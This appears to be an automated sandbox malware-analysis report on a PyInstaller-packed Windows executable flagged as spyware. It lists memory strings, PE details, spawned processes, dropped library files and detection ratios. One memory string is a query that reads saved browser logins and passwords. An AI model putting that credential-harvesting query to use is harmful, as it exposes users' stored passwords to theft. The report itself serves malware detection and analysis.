Source: 4Vp6Xc8SFr.exe, 00000000.00000003.257061462.0000025976DCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.256342465.0000025976DCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.254625193.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.256791919.0000025976DCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.254845722.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.257898319.0000025976DCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.257481371.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe	Binary or memory string: OriginalFilename vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.338254047.00007FFD10186000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.337690930.00007FFD04455000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.338408218.00007FFD1289B000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.335503590.00007FFD0199B000.00000002.00000001.01000000.00000012.sdmp	Binary or memory string: OriginalFilenamelibsslH vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.333782856.00007FFCFDD03000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.338184851.00007FFD0F7E2000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.337897657.00007FFD048B6000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.337595425.00007FFD04425000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.335231146.00007FFCFE170000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamepython310.dll. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.338349238.00007FFD111D2000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs 4Vp6Xc8SFr.exe
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.338554631.00007FFD19B17000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs 4Vp6Xc8SFr.exe

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Section loaded: python3.dll

Jump to behavior

Source: 4Vp6Xc8SFr.exe	ReversingLabs: Detection: 45%
Source: 4Vp6Xc8SFr.exe	Virustotal: Detection: 60%

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe

File read: C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Jump to behavior

Source: 4Vp6Xc8SFr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\4Vp6Xc8SFr.exe C:\Users\user\Desktop\4Vp6Xc8SFr.exe
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Process created: C:\Users\user\Desktop\4Vp6Xc8SFr.exe C:\Users\user\Desktop\4Vp6Xc8SFr.exe
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Process created: C:\Users\user\Desktop\4Vp6Xc8SFr.exe C:\Users\user\Desktop\4Vp6Xc8SFr.exe	Jump to behavior

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI52202

Jump to behavior

Source: classification engine

Classification label: mal72.troj.spyw.winEXE@3/103@14/5

Source: 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT action_url, username_value, password_value FROM logins;
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.333608899.00007FFCFDCD2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.333608899.00007FFCFDCD2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.333608899.00007FFCFDCD2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.333608899.00007FFCFDCD2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.333608899.00007FFCFDCD2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.333608899.00007FFCFDCD2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.333608899.00007FFCFDCD2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Code function: 0_2_00007FF7DA8D7420 GetLastError,FormatMessageW,WideCharToMultiByte,

0_2_00007FF7DA8D7420

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe

File opened: C:\Users\user\Desktop\pyvenv.cfg

Jump to behavior

Source: 4Vp6Xc8SFr.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 4Vp6Xc8SFr.exe

Static file information: File size 9489558 > 1048576

Source: 4Vp6Xc8SFr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 4Vp6Xc8SFr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 4Vp6Xc8SFr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 4Vp6Xc8SFr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 4Vp6Xc8SFr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 4Vp6Xc8SFr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 4Vp6Xc8SFr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: 4Vp6Xc8SFr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.257276309.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.257428994.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: 4Vp6Xc8SFr.exe, 00000001.00000002.333608899.00007FFCFDCD2000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.255729722.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: 4Vp6Xc8SFr.exe, 00000001.00000002.338072096.00007FFD04BB3000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.256211868.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.255519359.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.256814450.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.257207150.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.254845722.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.337874153.00007FFD048B3000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.257481371.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: 4Vp6Xc8SFr.exe, 00000001.00000002.337540020.00007FFD0440D000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.254728364.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.337643719.00007FFD0444C000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.255932396.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.256962278.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.256710021.0000025976DCC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.257170724.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.255568176.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: 4Vp6Xc8SFr.exe, 00000001.00000002.338389314.00007FFD12890000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.256342465.0000025976DCC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.255252884.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.255603845.0000025976DCC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: 4Vp6Xc8SFr.exe, 00000001.00000002.335464508.00007FFD01966000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.257129910.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.254898897.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.254230532.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.338538781.00007FFD19B11000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.256526003.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.260683507.0000025976DCD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: 4Vp6Xc8SFr.exe, 00000001.00000002.338072096.00007FFD04BB3000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.258048029.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\select.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.260139268.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.338283175.00007FFD10D23000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.255842075.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.256764108.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\libssl-1_1.pdb source: 4Vp6Xc8SFr.exe, 00000001.00000002.335464508.00007FFD01966000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\python310.pdb source: 4Vp6Xc8SFr.exe, 00000001.00000002.334748634.00007FFCFE052000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.254324143.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.338332746.00007FFD111CD000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.256297072.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.255478477.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.257020234.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.256078416.0000025976DCC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.257308921.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.254625193.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.338451913.00007FFD15406000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.256464824.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.256260543.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.258095070.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbNN source: 4Vp6Xc8SFr.exe, 00000000.00000003.254728364.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.337643719.00007FFD0444C000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.256580154.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.256915427.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.256624298.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.255782102.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.257403780.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.256034149.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.255987368.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.257242821.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: 4Vp6Xc8SFr.exe, 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 4Vp6Xc8SFr.exe, 00000000.00000003.257593904.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp

Source: 4Vp6Xc8SFr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 4Vp6Xc8SFr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 4Vp6Xc8SFr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 4Vp6Xc8SFr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 4Vp6Xc8SFr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: 4Vp6Xc8SFr.exe	Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.0.dr	Static PE information: section name: .00cfg
Source: libssl-1_1.dll.0.dr	Static PE information: section name: .00cfg
Source: python310.dll.0.dr	Static PE information: section name: PyRuntim
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA
Source: _raw_cfb.pyd.0.dr	Static PE information: section name: _RDATA
Source: _raw_ctr.pyd.0.dr	Static PE information: section name: _RDATA
Source: _raw_des.pyd.0.dr	Static PE information: section name: _RDATA
Source: _raw_des3.pyd.0.dr	Static PE information: section name: _RDATA
Source: _raw_ecb.pyd.0.dr	Static PE information: section name: _RDATA
Source: _raw_eksblowfish.pyd.0.dr	Static PE information: section name: _RDATA
Source: _raw_ocb.pyd.0.dr	Static PE information: section name: _RDATA
Source: _raw_ofb.pyd.0.dr	Static PE information: section name: _RDATA
Source: _BLAKE2b.pyd.0.dr	Static PE information: section name: _RDATA
Source: _BLAKE2s.pyd.0.dr	Static PE information: section name: _RDATA
Source: _ARC4.pyd.0.dr	Static PE information: section name: _RDATA
Source: _Salsa20.pyd.0.dr	Static PE information: section name: _RDATA
Source: _chacha20.pyd.0.dr	Static PE information: section name: _RDATA
Source: _pkcs1_decode.pyd.0.dr	Static PE information: section name: _RDATA
Source: _raw_aes.pyd.0.dr	Static PE information: section name: _RDATA
Source: _raw_aesni.pyd.0.dr	Static PE information: section name: _RDATA
Source: _raw_arc2.pyd.0.dr	Static PE information: section name: _RDATA
Source: _raw_blowfish.pyd.0.dr	Static PE information: section name: _RDATA
Source: _raw_cast.pyd.0.dr	Static PE information: section name: _RDATA
Source: _raw_cbc.pyd.0.dr	Static PE information: section name: _RDATA
Source: _MD2.pyd.0.dr	Static PE information: section name: _RDATA
Source: _MD4.pyd.0.dr	Static PE information: section name: _RDATA
Source: _MD5.pyd.0.dr	Static PE information: section name: _RDATA
Source: _RIPEMD160.pyd.0.dr	Static PE information: section name: _RDATA
Source: _SHA1.pyd.0.dr	Static PE information: section name: _RDATA
Source: _SHA224.pyd.0.dr	Static PE information: section name: _RDATA
Source: _SHA256.pyd.0.dr	Static PE information: section name: _RDATA
Source: _SHA384.pyd.0.dr	Static PE information: section name: _RDATA
Source: _SHA512.pyd.0.dr	Static PE information: section name: _RDATA
Source: _ghash_clmul.pyd.0.dr	Static PE information: section name: _RDATA
Source: _ghash_portable.pyd.0.dr	Static PE information: section name: _RDATA
Source: _keccak.pyd.0.dr	Static PE information: section name: _RDATA
Source: _poly1305.pyd.0.dr	Static PE information: section name: _RDATA
Source: _modexp.pyd.0.dr	Static PE information: section name: _RDATA
Source: _scrypt.pyd.0.dr	Static PE information: section name: _RDATA
Source: _ec_ws.pyd.0.dr	Static PE information: section name: _RDATA
Source: _ed25519.pyd.0.dr	Static PE information: section name: _RDATA
Source: _ed448.pyd.0.dr	Static PE information: section name: _RDATA
Source: _x25519.pyd.0.dr	Static PE information: section name: _RDATA
Source: _cpuid_c.pyd.0.dr	Static PE information: section name: _RDATA
Source: _strxor.pyd.0.dr	Static PE information: section name: _RDATA

Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr

Static PE information: 0xF1D9C1E0 [Wed Jul 30 17:33:20 2098 UTC]

Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\4Vp6Xc8SFr.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI52202\select.pyd	Jump to dropped file
